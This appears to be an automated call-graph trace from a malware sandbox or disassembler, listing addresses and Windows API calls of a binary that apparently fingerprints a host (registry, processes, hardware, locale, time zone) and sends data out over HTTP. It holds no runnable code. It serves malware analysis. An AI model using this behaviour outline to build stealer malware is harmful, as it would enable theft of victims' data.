92a9b0 4 API calls 14708->14709 14710 914c06 14709->14710 14711 92a8a0 lstrcpy 14710->14711 14712 914c0f 14711->14712 14713 92a920 3 API calls 14712->14713 14714 914c2d 14713->14714 14715 92a8a0 lstrcpy 14714->14715 14716 914c36 14715->14716 14717 92a9b0 4 API calls 14716->14717 14718 914c55 14717->14718 14719 92a8a0 lstrcpy 14718->14719 14720 914c5e 14719->14720 14721 92a9b0 4 API calls 14720->14721 14722 914c7d 14721->14722 14723 92a8a0 lstrcpy 14722->14723 14724 914c86 14723->14724 14725 92a920 3 API calls 14724->14725 14726 914ca4 14725->14726 14727 92a8a0 lstrcpy 14726->14727 14728 914cad 14727->14728 14729 92a9b0 4 API calls 14728->14729 14730 914ccc 14729->14730 14731 92a8a0 lstrcpy 14730->14731 14732 914cd5 14731->14732 14733 92a9b0 4 API calls 14732->14733 14734 914cf6 14733->14734 14735 92a8a0 lstrcpy 14734->14735 14736 914cff 14735->14736 14737 92a9b0 4 API calls 14736->14737 14738 914d1f 14737->14738 14739 92a8a0 lstrcpy 14738->14739 14740 914d28 14739->14740 14741 92a9b0 4 API calls 14740->14741 14742 914d47 14741->14742 14743 92a8a0 lstrcpy 14742->14743 14744 914d50 14743->14744 14745 92a920 3 API calls 14744->14745 14746 914d6e 14745->14746 14747 92a8a0 lstrcpy 14746->14747 14748 914d77 14747->14748 14749 92a740 lstrcpy 14748->14749 14750 914d92 14749->14750 14751 92a920 3 API calls 14750->14751 14752 914db3 14751->14752 14753 92a920 3 API calls 14752->14753 14754 914dba 14753->14754 14755 92a8a0 lstrcpy 14754->14755 14756 914dc6 14755->14756 14757 914de7 lstrlen 14756->14757 14758 914dfa 14757->14758 14759 914e03 lstrlen 14758->14759 15696 92aad0 14759->15696 14761 914e13 HttpSendRequestA 14762 914e32 InternetReadFile 14761->14762 14763 914e67 InternetCloseHandle 14762->14763 14768 914e5e 14762->14768 14765 92a800 14763->14765 14765->14688 14766 92a9b0 4 API calls 14766->14768 14767 92a8a0 lstrcpy 14767->14768 14768->14762 14768->14763 14768->14766 14768->14767 15703 92aad0 14769->15703 14771 9217c4 StrCmpCA 14772 9217cf ExitProcess 14771->14772 14784 9217d7 14771->14784 14773 9219c2 14773->13692 14774 921932 StrCmpCA 14774->14784 14775 921913 StrCmpCA 14775->14784 14776 921970 StrCmpCA 14776->14784 14777 9218f1 StrCmpCA 14777->14784 14778 921951 StrCmpCA 14778->14784 14779 92187f StrCmpCA 14779->14784 14780 92185d StrCmpCA 14780->14784 14781 9218cf StrCmpCA 14781->14784 14782 9218ad StrCmpCA 14782->14784 14783 92a820 lstrlen lstrcpy 14783->14784 14784->14773 14784->14774 14784->14775 14784->14776 14784->14777 14784->14778 14784->14779 14784->14780 14784->14781 14784->14782 14784->14783 14786 92a7a0 lstrcpy 14785->14786 14787 915979 14786->14787 14788 9147b0 2 API calls 14787->14788 14789 915985 14788->14789 14790 92a740 lstrcpy 14789->14790 14791 9159ba 14790->14791 14792 92a740 lstrcpy 14791->14792 14793 9159c7 14792->14793 14794 92a740 lstrcpy 14793->14794 14795 9159d4 14794->14795 14796 92a740 lstrcpy 14795->14796 14797 9159e1 14796->14797 14798 92a740 lstrcpy 14797->14798 14799 9159ee InternetOpenA StrCmpCA 14798->14799 14800 915a1d 14799->14800 14801 915fc3 InternetCloseHandle 14800->14801 14803 928b60 3 API calls 14800->14803 14802 915fe0 14801->14802 14806 919ac0 4 API calls 14802->14806 14804 915a3c 14803->14804 14805 92a920 3 API calls 14804->14805 14807 915a4f 14805->14807 14808 915fe6 14806->14808 14809 92a8a0 lstrcpy 14807->14809 14810 92a820 2 API calls 14808->14810 14812 91601f ctype 14808->14812 14814 915a58 14809->14814 14811 915ffd 14810->14811 14813 92a9b0 4 API calls 14811->14813 14816 92a7a0 lstrcpy 14812->14816 14815 916013 14813->14815 14818 92a9b0 4 API calls 14814->14818 14817 92a8a0 lstrcpy 14815->14817 14826 91604f 14816->14826 14817->14812 14819 915a82 14818->14819 14820 92a8a0 lstrcpy 14819->14820 14821 915a8b 14820->14821 14822 92a9b0 4 API calls 14821->14822 14823 915aaa 14822->14823 14824 92a8a0 lstrcpy 14823->14824 14825 915ab3 14824->14825 14827 92a920 3 API calls 14825->14827 14826->13698 14828 915ad1 14827->14828 14829 92a8a0 lstrcpy 14828->14829 14830 915ada 14829->14830 14831 92a9b0 4 API calls 14830->14831 14832 915af9 14831->14832 14833 92a8a0 lstrcpy 14832->14833 14834 915b02 14833->14834 14835 92a9b0 4 API calls 14834->14835 14836 915b21 14835->14836 14837 92a8a0 lstrcpy 14836->14837 14838 915b2a 14837->14838 14839 92a9b0 4 API calls 14838->14839 14840 915b56 14839->14840 14841 92a920 3 API calls 14840->14841 14842 915b5d 14841->14842 14843 92a8a0 lstrcpy 14842->14843 14844 915b66 14843->14844 14845 915b7c InternetConnectA 14844->14845 14845->14801 14846 915bac HttpOpenRequestA 14845->14846 14848 915fb6 InternetCloseHandle 14846->14848 14849 915c0b 14846->14849 14848->14801 14850 92a9b0 4 API calls 14849->14850 14851 915c1f 14850->14851 14852 92a8a0 lstrcpy 14851->14852 14853 915c28 14852->14853 14854 92a920 3 API calls 14853->14854 14855 915c46 14854->14855 14856 92a8a0 lstrcpy 14855->14856 14857 915c4f 14856->14857 14858 92a9b0 4 API calls 14857->14858 14859 915c6e 14858->14859 14860 92a8a0 lstrcpy 14859->14860 14861 915c77 14860->14861 14862 92a9b0 4 API calls 14861->14862 14863 915c98 14862->14863 14864 92a8a0 lstrcpy 14863->14864 14865 915ca1 14864->14865 14866 92a9b0 4 API calls 14865->14866 14867 915cc1 14866->14867 14868 92a8a0 lstrcpy 14867->14868 14869 915cca 14868->14869 14870 92a9b0 4 API calls 14869->14870 14871 915ce9 14870->14871 14872 92a8a0 lstrcpy 14871->14872 14873 915cf2 14872->14873 14874 92a920 3 API calls 14873->14874 14875 915d10 14874->14875 14876 92a8a0 lstrcpy 14875->14876 14877 915d19 14876->14877 14878 92a9b0 4 API calls 14877->14878 14879 915d38 14878->14879 14880 92a8a0 lstrcpy 14879->14880 14881 915d41 14880->14881 14882 92a9b0 4 API calls 14881->14882 14883 915d60 14882->14883 14884 92a8a0 lstrcpy 14883->14884 14885 915d69 14884->14885 14886 92a920 3 API calls 14885->14886 14887 915d87 14886->14887 14888 92a8a0 lstrcpy 14887->14888 14889 915d90 14888->14889 14890 92a9b0 4 API calls 14889->14890 14891 915daf 14890->14891 14892 92a8a0 lstrcpy 14891->14892 14893 915db8 14892->14893 14894 92a9b0 4 API calls 14893->14894 14895 915dd9 14894->14895 14896 92a8a0 lstrcpy 14895->14896 14897 915de2 14896->14897 14898 92a9b0 4 API calls 14897->14898 14899 915e02 14898->14899 14900 92a8a0 lstrcpy 14899->14900 14901 915e0b 14900->14901 14902 92a9b0 4 API calls 14901->14902 14903 915e2a 14902->14903 14904 92a8a0 lstrcpy 14903->14904 14905 915e33 14904->14905 14906 92a920 3 API calls 14905->14906 14907 915e54 14906->14907 14908 92a8a0 lstrcpy 14907->14908 14909 915e5d 14908->14909 14910 915e70 lstrlen 14909->14910 15704 92aad0 14910->15704 14912 915e81 lstrlen GetProcessHeap RtlAllocateHeap 15705 92aad0 14912->15705 14914 915eae lstrlen 14915 915ebe 14914->14915 14916 915ed7 lstrlen 14915->14916 14917 915ee7 14916->14917 14918 915ef0 lstrlen 14917->14918 14919 915f03 14918->14919 14920 915f1a lstrlen 14919->14920 15706 92aad0 14920->15706 14922 915f2a HttpSendRequestA 14923 915f35 InternetReadFile 14922->14923 14924 915f61 14923->14924 14925 915f6a InternetCloseHandle 14923->14925 14924->14923 14924->14925 14927 92a9b0 4 API calls 14924->14927 14928 92a8a0 lstrcpy 14924->14928 14925->14848 14927->14924 14928->14924 14931 921077 14929->14931 14930 921151 14930->13700 14931->14930 14932 92a820 lstrlen lstrcpy 14931->14932 14932->14931 14934 920db7 14933->14934 14935 920f17 14934->14935 14936 920e27 StrCmpCA 14934->14936 14937 920e67 StrCmpCA 14934->14937 14938 920ea4 StrCmpCA 14934->14938 14939 92a820 lstrlen lstrcpy 14934->14939 14935->13708 14936->14934 14937->14934 14938->14934 14939->14934 14943 920f67 14940->14943 14941 921044 14941->13716 14942 920fb2 StrCmpCA 14942->14943 14943->14941 14943->14942 14944 92a820 lstrlen lstrcpy 14943->14944 14944->14943 14946 92a740 lstrcpy 14945->14946 14947 921a26 14946->14947 14948 92a9b0 4 API calls 14947->14948 14949 921a37 14948->14949 14950 92a8a0 lstrcpy 14949->14950 14951 921a40 14950->14951 14952 92a9b0 4 API calls 14951->14952 14953 921a5b 14952->14953 14954 92a8a0 lstrcpy 14953->14954 14955 921a64 14954->14955 14956 92a9b0 4 API calls 14955->14956 14957 921a7d 14956->14957 14958 92a8a0 lstrcpy 14957->14958 14959 921a86 14958->14959 14960 92a9b0 4 API calls 14959->14960 14961 921aa1 14960->14961 14962 92a8a0 lstrcpy 14961->14962 14963 921aaa 14962->14963 14964 92a9b0 4 API calls 14963->14964 14965 921ac3 14964->14965 14966 92a8a0 lstrcpy 14965->14966 14967 921acc 14966->14967 14968 92a9b0 4 API calls 14967->14968 14969 921ae7 14968->14969 14970 92a8a0 lstrcpy 14969->14970 14971 921af0 14970->14971 14972 92a9b0 4 API calls 14971->14972 14973 921b09 14972->14973 14974 92a8a0 lstrcpy 14973->14974 14975 921b12 14974->14975 14976 92a9b0 4 API calls 14975->14976 14977 921b2d 14976->14977 14978 92a8a0 lstrcpy 14977->14978 14979 921b36 14978->14979 14980 92a9b0 4 API calls 14979->14980 14981 921b4f 14980->14981 14982 92a8a0 lstrcpy 14981->14982 14983 921b58 14982->14983 14984 92a9b0 4 API calls 14983->14984 14985 921b76 14984->14985 14986 92a8a0 lstrcpy 14985->14986 14987 921b7f 14986->14987 14988 927500 6 API calls 14987->14988 14989 921b96 14988->14989 14990 92a920 3 API calls 14989->14990 14991 921ba9 14990->14991 14992 92a8a0 lstrcpy 14991->14992 14993 921bb2 14992->14993 14994 92a9b0 4 API calls 14993->14994 14995 921bdc 14994->14995 14996 92a8a0 lstrcpy 14995->14996 14997 921be5 14996->14997 14998 92a9b0 4 API calls 14997->14998 14999 921c05 14998->14999 15000 92a8a0 lstrcpy 14999->15000 15001 921c0e 15000->15001 15707 927690 GetProcessHeap RtlAllocateHeap 15001->15707 15004 92a9b0 4 API calls 15005 921c2e 15004->15005 15006 92a8a0 lstrcpy 15005->15006 15007 921c37 15006->15007 15008 92a9b0 4 API calls 15007->15008 15009 921c56 15008->15009 15010 92a8a0 lstrcpy 15009->15010 15011 921c5f 15010->15011 15012 92a9b0 4 API calls 15011->15012 15013 921c80 15012->15013 15014 92a8a0 lstrcpy 15013->15014 15015 921c89 15014->15015 15714 9277c0 GetCurrentProcess IsWow64Process 15015->15714 15018 92a9b0 4 API calls 15019 921ca9 15018->15019 15020 92a8a0 lstrcpy 15019->15020 15021 921cb2 15020->15021 15022 92a9b0 4 API calls 15021->15022 15023 921cd1 15022->15023 15024 92a8a0 lstrcpy 15023->15024 15025 921cda 15024->15025 15026 92a9b0 4 API calls 15025->15026 15027 921cfb 15026->15027 15028 92a8a0 lstrcpy 15027->15028 15029 921d04 15028->15029 15030 927850 3 API calls 15029->15030 15031 921d14 15030->15031 15032 92a9b0 4 API calls 15031->15032 15033 921d24 15032->15033 15034 92a8a0 lstrcpy 15033->15034 15035 921d2d 15034->15035 15036 92a9b0 4 API calls 15035->15036 15037 921d4c 15036->15037 15038 92a8a0 lstrcpy 15037->15038 15039 921d55 15038->15039 15040 92a9b0 4 API calls 15039->15040 15041 921d75 15040->15041 15042 92a8a0 lstrcpy 15041->15042 15043 921d7e 15042->15043 15044 9278e0 3 API calls 15043->15044 15045 921d8e 15044->15045 15046 92a9b0 4 API calls 15045->15046 15047 921d9e 15046->15047 15048 92a8a0 lstrcpy 15047->15048 15049 921da7 15048->15049 15050 92a9b0 4 API calls 15049->15050 15051 921dc6 15050->15051 15052 92a8a0 lstrcpy 15051->15052 15053 921dcf 15052->15053 15054 92a9b0 4 API calls 15053->15054 15055 921df0 15054->15055 15056 92a8a0 lstrcpy 15055->15056 15057 921df9 15056->15057 15716 927980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15057->15716 15060 92a9b0 4 API calls 15061 921e19 15060->15061 15062 92a8a0 lstrcpy 15061->15062 15063 921e22 15062->15063 15064 92a9b0 4 API calls 15063->15064 15065 921e41 15064->15065 15066 92a8a0 lstrcpy 15065->15066 15067 921e4a 15066->15067 15068 92a9b0 4 API calls 15067->15068 15069 921e6b 15068->15069 15070 92a8a0 lstrcpy 15069->15070 15071 921e74 15070->15071 15718 927a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15071->15718 15074 92a9b0 4 API calls 15075 921e94 15074->15075 15076 92a8a0 lstrcpy 15075->15076 15077 921e9d 15076->15077 15078 92a9b0 4 API calls 15077->15078 15079 921ebc 15078->15079 15080 92a8a0 lstrcpy 15079->15080 15081 921ec5 15080->15081 15082 92a9b0 4 API calls 15081->15082 15083 921ee5 15082->15083 15084 92a8a0 lstrcpy 15083->15084 15085 921eee 15084->15085 15721 927b00 GetUserDefaultLocaleName 15085->15721 15088 92a9b0 4 API calls 15089 921f0e 15088->15089 15090 92a8a0 lstrcpy 15089->15090 15091 921f17 15090->15091 15092 92a9b0 4 API calls 15091->15092 15093 921f36 15092->15093 15094 92a8a0 lstrcpy 15093->15094 15095 921f3f 15094->15095 15096 92a9b0 4 API calls 15095->15096 15097 921f60 15096->15097 15098 92a8a0 lstrcpy 15097->15098 15099 921f69 15098->15099 15725 927b90 15099->15725 15101 921f80 15102 92a920 3 API calls 15101->15102 15103 921f93 15102->15103 15104 92a8a0 lstrcpy 15103->15104 15105 921f9c 15104->15105 15106 92a9b0 4 API calls 15105->15106 15107 921fc6 15106->15107 15108 92a8a0 lstrcpy 15107->15108 15109 921fcf 15108->15109 15110 92a9b0 4 API calls 15109->15110 15111 921fef 15110->15111 15112 92a8a0 lstrcpy 15111->15112 15113 921ff8 15112->15113 15737 927d80 GetSystemPowerStatus 15113->15737 15116 92a9b0 4 API calls 15117 922018 15116->15117 15118 92a8a0 lstrcpy 15117->15118 15119 922021 15118->15119 15120 92a9b0 4 API calls 15119->15120 15121 922040 15120->15121 15122 92a8a0 lstrcpy 15121->15122 15123 922049 15122->15123 15124 92a9b0 4 API calls 15123->15124 15125 92206a 15124->15125 15126 92a8a0 lstrcpy 15125->15126 15127 922073 15126->15127 15128 92207e GetCurrentProcessId 15127->15128 15739 929470 OpenProcess 15128->15739 15131 92a920 3 API calls 15132 9220a4 15131->15132 15133 92a8a0 lstrcpy 15132->15133 15134 9220ad 15133->15134 15135 92a9b0 4 API calls 15134->15135 15136 9220d7 15135->15136 15137 92a8a0 lstrcpy 15136->15137 15138 9220e0 15137->15138 15139 92a9b0 4 API calls 15138->15139 15140 922100 15139->15140 15141 92a8a0 lstrcpy 15140->15141 15142 922109 15141->15142 15744 927e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15142->15744 15145 92a9b0 4 API calls 15146 922129 15145->15146 15147 92a8a0 lstrcpy 15146->15147 15148 922132 15147->15148 15149 92a9b0 4 API calls 15148->15149 15150 922151 15149->15150 15151 92a8a0 lstrcpy 15150->15151 15152 92215a 15151->15152 15153 92a9b0 4 API calls 15152->15153 15154 92217b 15153->15154 15155 92a8a0 lstrcpy 15154->15155 15156 922184 15155->15156 15748 927f60 15156->15748 15159 92a9b0 4 API calls 15160 9221a4 15159->15160 15161 92a8a0 lstrcpy 15160->15161 15162 9221ad 15161->15162 15163 92a9b0 4 API calls 15162->15163 15164 9221cc 15163->15164 15165 92a8a0 lstrcpy 15164->15165 15166 9221d5 15165->15166 15167 92a9b0 4 API calls 15166->15167 15168 9221f6 15167->15168 15169 92a8a0 lstrcpy 15168->15169 15170 9221ff 15169->15170 15761 927ed0 GetSystemInfo wsprintfA 15170->15761 15173 92a9b0 4 API calls 15174 92221f 15173->15174 15175 92a8a0 lstrcpy 15174->15175 15176 922228 15175->15176 15177 92a9b0 4 API calls 15176->15177 15178 922247 15177->15178 15179 92a8a0 lstrcpy 15178->15179 15180 922250 15179->15180 15181 92a9b0 4 API calls 15180->15181 15182 922270 15181->15182 15183 92a8a0 lstrcpy 15182->15183 15184 922279 15183->15184 15763 928100 GetProcessHeap RtlAllocateHeap 15184->15763 15187 92a9b0 4 API calls 15188 922299 15187->15188 15189 92a8a0 lstrcpy 15188->15189 15190 9222a2 15189->15190 15191 92a9b0 4 API calls 15190->15191 15192 9222c1 15191->15192 15193 92a8a0 lstrcpy 15192->15193 15194 9222ca 15193->15194 15195 92a9b0 4 API calls 15194->15195 15196 9222eb 15195->15196 15197 92a8a0 lstrcpy 15196->15197 15198 9222f4 15197->15198 15769 9287c0 15198->15769 15201 92a920 3 API calls 15202 92231e 15201->15202 15203 92a8a0 lstrcpy 15202->15203 15204 922327 15203->15204 15205 92a9b0 4 API calls 15204->15205 15206 922351 15205->15206 15207 92a8a0 lstrcpy 15206->15207 15208 92235a 15207->15208 15209 92a9b0 4 API calls 15208->15209 15210 92237a 15209->15210 15211 92a8a0 lstrcpy 15210->15211 15212 922383 15211->15212 15213 92a9b0 4 API calls 15212->15213 15214 9223a2 15213->15214 15215 92a8a0 lstrcpy 15214->15215 15216 9223ab 15215->15216 15774 9281f0 15216->15774 15218 9223c2 15219 92a920 3 API calls 15218->15219 15220 9223d5 15219->15220 15221 92a8a0 lstrcpy 15220->15221 15222 9223de 15221->15222 15223 92a9b0 4 API calls 15222->15223 15224 92240a 15223->15224 15225 92a8a0 lstrcpy 15224->15225 15226 922413 15225->15226 15227 92a9b0 4 API calls 15226->15227 15228 922432 15227->15228 15229 92a8a0 lstrcpy 15228->15229 15230 92243b 15229->15230 15231 92a9b0 4 API calls 15230->15231 15232 92245c 15231->15232 15233 92a8a0 lstrcpy 15232->15233 15234 922465 15233->15234 15235 92a9b0 4 API calls 15234->15235 15236 922484 15235->15236 15237 92a8a0 lstrcpy 15236->15237 15238 92248d 15237->15238 15239 92a9b0 4 API calls 15238->15239 15240 9224ae 15239->15240 15241 92a8a0 lstrcpy 15240->15241 15242 9224b7 15241->15242 15782 928320 15242->15782 15244 9224d3 15245 92a920 3 API calls 15244->15245 15246 9224e6 15245->15246 15247 92a8a0 lstrcpy 15246->15247 15248 9224ef 15247->15248 15249 92a9b0 4 API calls 15248->15249 15250 922519 15249->15250 15251 92a8a0 lstrcpy 15250->15251 15252 922522 15251->15252 15253 92a9b0 4 API calls 15252->15253 15254 922543 15253->15254 15255 92a8a0 lstrcpy 15254->15255 15256 92254c 15255->15256 15257 928320 17 API calls 15256->15257 15258 922568 15257->15258 15259 92a920 3 API calls 15258->15259 15260 92257b 15259->15260 15261 92a8a0 lstrcpy 15260->15261 15262 922584 15261->15262 15263 92a9b0 4 API calls 15262->15263 15264 9225ae 15263->15264 15265 92a8a0 lstrcpy 15264->15265 15266 9225b7 15265->15266 15267 92a9b0 4 API calls 15266->15267 15268 9225d6 15267->15268 15269 92a8a0 lstrcpy 15268->15269 15270 9225df 15269->15270 15271 92a9b0 4 API calls 15270->15271 15272 922600 15271->15272 15273 92a8a0 lstrcpy 15272->15273 15274 922609 15273->15274 15818 928680 15274->15818 15276 922620 15277 92a920 3 API calls 15276->15277 15278 922633 15277->15278 15279 92a8a0 lstrcpy 15278->15279 15280 92263c 15279->15280 15281 92265a lstrlen 15280->15281 15282 92266a 15281->15282 15283 92a740 lstrcpy 15282->15283 15284 92267c 15283->15284 15285 911590 lstrcpy 15284->15285 15286 92268d 15285->15286 15828 925190 15286->15828 15288 922699 15288->13720 16016 92aad0 15289->16016 15291 915009 InternetOpenUrlA 15295 915021 15291->15295 15292 9150a0 InternetCloseHandle InternetCloseHandle 15294 9150ec 15292->15294 15293 91502a InternetReadFile 15293->15295 15294->13724 15295->15292 15295->15293 16017 9198d0 15296->16017 15298 920759 15299 920a38 15298->15299 15300 92077d 15298->15300 15301 911590 lstrcpy 15299->15301 15302 920799 StrCmpCA 15300->15302 15303 920a49 15301->15303 15304 9207a8 15302->15304 15332 920843 15302->15332 16193 920250 15303->16193 15307 92a7a0 lstrcpy 15304->15307 15309 9207c3 15307->15309 15308 920865 StrCmpCA 15310 920874 15308->15310 15348 92096b 15308->15348 15311 911590 lstrcpy 15309->15311 15312 92a740 lstrcpy 15310->15312 15313 92080c 15311->15313 15315 920881 15312->15315 15316 92a7a0 lstrcpy 15313->15316 15314 92099c StrCmpCA 15317 920a2d 15314->15317 15318 9209ab 15314->15318 15319 92a9b0 4 API calls 15315->15319 15320 920823 15316->15320 15317->13728 15321 911590 lstrcpy 15318->15321 15322 9208ac 15319->15322 15323 92a7a0 lstrcpy 15320->15323 15324 9209f4 15321->15324 15325 92a920 3 API calls 15322->15325 15326 92083e 15323->15326 15327 92a7a0 lstrcpy 15324->15327 15328 9208b3 15325->15328 16020 91fb00 15326->16020 15330 920a0d 15327->15330 15331 92a9b0 4 API calls 15328->15331 15333 92a7a0 lstrcpy 15330->15333 15334 9208ba 15331->15334 15332->15308 15335 920a28 15333->15335 15336 92a8a0 lstrcpy 15334->15336 16136 920030 15335->16136 15348->15314 15668 92a7a0 lstrcpy 15667->15668 15669 911683 15668->15669 15670 92a7a0 lstrcpy 15669->15670 15671 911695 15670->15671 15672 92a7a0 lstrcpy 15671->15672 15673 9116a7 15672->15673 15674 92a7a0 lstrcpy 15673->15674 15675 9115a3 15674->15675 15675->14551 15677 9147c6 15676->15677 15678 914838 lstrlen 15677->15678 15702 92aad0 15678->15702 15680 914848 InternetCrackUrlA 15681 914867 15680->15681 15681->14628 15683 92a740 lstrcpy 15682->15683 15684 928b74 15683->15684 15685 92a740 lstrcpy 15684->15685 15686 928b82 GetSystemTime 15685->15686 15688 928b99 15686->15688 15687 92a7a0 lstrcpy 15689 928bfc 15687->15689 15688->15687 15689->14643 15691 92a931 15690->15691 15692 92a988 15691->15692 15694 92a968 lstrcpy lstrcat 15691->15694 15693 92a7a0 lstrcpy 15692->15693 15695 92a994 15693->15695 15694->15692 15695->14646 15696->14761 15698 919af9 LocalAlloc 15697->15698 15699 914eee 15697->15699 15698->15699 15700 919b14 CryptStringToBinaryA 15698->15700 15699->14649 15699->14651 15700->15699 15701 919b39 LocalFree 15700->15701 15701->15699 15702->15680 15703->14771 15704->14912 15705->14914 15706->14922 15835 9277a0 15707->15835 15710 9276c6 RegOpenKeyExA 15712 9276e7 RegQueryValueExA 15710->15712 15713 927704 RegCloseKey 15710->15713 15711 921c1e 15711->15004 15712->15713 15713->15711 15715 921c99 15714->15715 15715->15018 15717 921e09 15716->15717 15717->15060 15719 921e84 15718->15719 15720 927a9a wsprintfA 15718->15720 15719->15074 15720->15719 15722 921efe 15721->15722 15723 927b4d 15721->15723 15722->15088 15842 928d20 LocalAlloc CharToOemW 15723->15842 15726 92a740 lstrcpy 15725->15726 15727 927bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15726->15727 15734 927c25 15727->15734 15728 927c46 GetLocaleInfoA 15728->15734 15729 927d18 15730 927d28 15729->15730 15731 927d1e LocalFree 15729->15731 15733 92a7a0 lstrcpy 15730->15733 15731->15730 15732 92a9b0 lstrcpy lstrlen lstrcpy lstrcat 15732->15734 15735 927d37 15733->15735 15734->15728 15734->15729 15734->15732 15736 92a8a0 lstrcpy 15734->15736 15735->15101 15736->15734 15738 922008 15737->15738 15738->15116 15740 929493 GetModuleFileNameExA CloseHandle 15739->15740 15741 9294b5 15739->15741 15740->15741 15742 92a740 lstrcpy 15741->15742 15743 922091 15742->15743 15743->15131 15745 922119 15744->15745 15746 927e68 RegQueryValueExA 15744->15746 15745->15145 15747 927e8e RegCloseKey 15746->15747 15747->15745 15749 927fb9 GetLogicalProcessorInformationEx 15748->15749 15750 927fd8 GetLastError 15749->15750 15755 928029 15749->15755 15751 928022 15750->15751 15757 927fe3 15750->15757 15754 922194 15751->15754 15758 9289f0 2 API calls 15751->15758 15754->15159 15756 9289f0 2 API calls 15755->15756 15759 92807b 15756->15759 15757->15749 15757->15754 15843 9289f0 15757->15843 15846 928a10 GetProcessHeap RtlAllocateHeap 15757->15846 15758->15754 15759->15751 15760 928084 wsprintfA 15759->15760 15760->15754 15762 92220f 15761->15762 15762->15173 15764 9289b0 15763->15764 15765 92814d GlobalMemoryStatusEx 15764->15765 15768 928163 15765->15768 15766 92819b wsprintfA 15767 922289 15766->15767 15767->15187 15768->15766 15770 9287fb GetProcessHeap RtlAllocateHeap wsprintfA 15769->15770 15772 92a740 lstrcpy 15770->15772 15773 92230b 15772->15773 15773->15201 15775 92a740 lstrcpy 15774->15775 15777 928229 15775->15777 15776 928263 15778 92a7a0 lstrcpy 15776->15778 15777->15776 15779 92a9b0 lstrcpy lstrlen lstrcpy lstrcat 15777->15779 15781 92a8a0 lstrcpy 15777->15781 15780 9282dc 15778->15780 15779->15777 15780->15218 15781->15777 15783 92a740 lstrcpy 15782->15783 15784 92835c RegOpenKeyExA 15783->15784 15785 9283d0 15784->15785 15786 9283ae 15784->15786 15788 928613 RegCloseKey 15785->15788 15789 9283f8 RegEnumKeyExA 15785->15789 15787 92a7a0 lstrcpy 15786->15787 15799 9283bd 15787->15799 15792 92a7a0 lstrcpy 15788->15792 15790 92860e 15789->15790 15791 92843f wsprintfA RegOpenKeyExA 15789->15791 15790->15788 15793 9284c1 RegQueryValueExA 15791->15793 15794 928485 RegCloseKey RegCloseKey 15791->15794 15792->15799 15795 928601 RegCloseKey 15793->15795 15796 9284fa lstrlen 15793->15796 15797 92a7a0 lstrcpy 15794->15797 15795->15790 15796->15795 15798 928510 15796->15798 15797->15799 15800 92a9b0 4 API calls 15798->15800 15799->15244 15801 928527 15800->15801 15802 92a8a0 lstrcpy 15801->15802 15803 928533 15802->15803 15804 92a9b0 4 API calls 15803->15804 15805 928557 15804->15805 15806 92a8a0 lstrcpy 15805->15806 15807 928563 15806->15807 15808 92856e RegQueryValueExA 15807->15808 15808->15795 15809 9285a3 15808->15809 15810 92a9b0 4 API calls 15809->15810 15811 9285ba 15810->15811 15812 92a8a0 lstrcpy 15811->15812 15813 9285c6 15812->15813 15814 92a9b0 4 API calls 15813->15814 15815 9285ea 15814->15815 15816 92a8a0 lstrcpy 15815->15816 15817 9285f6 15816->15817 15817->15795 15819 92a740 lstrcpy 15818->15819 15820 9286bc CreateToolhelp32Snapshot Process32First 15819->15820 15821 9286e8 Process32Next 15820->15821 15822 92875d CloseHandle 15820->15822 15821->15822 15827 9286fd 15821->15827 15823 92a7a0 lstrcpy 15822->15823 15826 928776 15823->15826 15824 92a9b0 lstrcpy lstrlen lstrcpy lstrcat 15824->15827 15825 92a8a0 lstrcpy 15825->15827 15826->15276 15827->15821 15827->15824 15827->15825 15829 92a7a0 lstrcpy 15828->15829 15830 9251b5 15829->15830 15831 911590 lstrcpy 15830->15831 15832 9251c6 15831->15832 15847 915100 15832->15847 15834 9251cf 15834->15288 15838 927720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15835->15838 15837 9276b9 15837->15710 15837->15711 15839 927780 RegCloseKey 15838->15839 15840 927765 RegQueryValueExA 15838->15840 15841 927793 15839->15841 15840->15839 15841->15837 15842->15722 15844 9289f9 GetProcessHeap HeapFree 15843->15844 15845 928a0c 15843->15845 15844->15845 15845->15757 15846->15757 15848 92a7a0 lstrcpy 15847->15848 15849 915119 15848->15849 15850 9147b0 2 API calls 15849->15850 15851 915125 15850->15851 16007 928ea0 15851->16007 15853 915184 15854 915192 lstrlen 15853->15854 15855 9151a5 15854->15855 15856 928ea0 4 API calls 15855->15856 15857 9151b6 15856->15857 15858 92a740 lstrcpy 15857->15858 15859 9151c9 15858->15859 15860 92a740 lstrcpy 15859->15860 15861 9151d6 15860->15861 15862 92a740 lstrcpy 15861->15862 15863 9151e3 15862->15863 15864 92a740 lstrcpy 15863->15864 15865 9151f0 15864->15865 15866 92a740 lstrcpy 15865->15866 15867 9151fd InternetOpenA StrCmpCA 15866->15867 15868 91522f 15867->15868 15869 9158c4 InternetCloseHandle 15868->15869 15870 928b60 3 API calls 15868->15870 15876 9158d9 ctype 15869->15876 15871 91524e 15870->15871 15872 92a920 3 API calls 15871->15872 15873 915261 15872->15873 15874 92a8a0 lstrcpy 15873->15874 15875 91526a 15874->15875 15877 92a9b0 4 API calls 15875->15877 15880 92a7a0 lstrcpy 15876->15880 15878 9152ab 15877->15878 15879 92a920 3 API calls 15878->15879 15881 9152b2 15879->15881 15888 915913 15880->15888 15882 92a9b0 4 API calls 15881->15882 15883 9152b9 15882->15883 15884 92a8a0 lstrcpy 15883->15884 15885 9152c2 15884->15885 15886 92a9b0 4 API calls 15885->15886 15887 915303 15886->15887 15889 92a920 3 API calls 15887->15889 15888->15834 15890 91530a 15889->15890 15891 92a8a0 lstrcpy 15890->15891 15892 915313 15891->15892 15893 915329 InternetConnectA 15892->15893 15893->15869 15894 915359 HttpOpenRequestA 15893->15894 15896 9158b7 InternetCloseHandle 15894->15896 15897 9153b7 15894->15897 15896->15869 15898 92a9b0 4 API calls 15897->15898 15899 9153cb 15898->15899 15900 92a8a0 lstrcpy 15899->15900 15901 9153d4 15900->15901 15902 92a920 3 API calls 15901->15902 15903 9153f2 15902->15903 15904 92a8a0 lstrcpy 15903->15904 15905 9153fb 15904->15905 15906 92a9b0 4 API calls 15905->15906 15907 91541a 15906->15907 15908 92a8a0 lstrcpy 15907->15908 15909 915423 15908->15909 15910 92a9b0 4 API calls 15909->15910 15911 915444 15910->15911 15912 92a8a0 lstrcpy 15911->15912 15913 91544d 15912->15913 15914 92a9b0 4 API calls 15913->15914 15915 91546e 15914->15915 15916 92a8a0 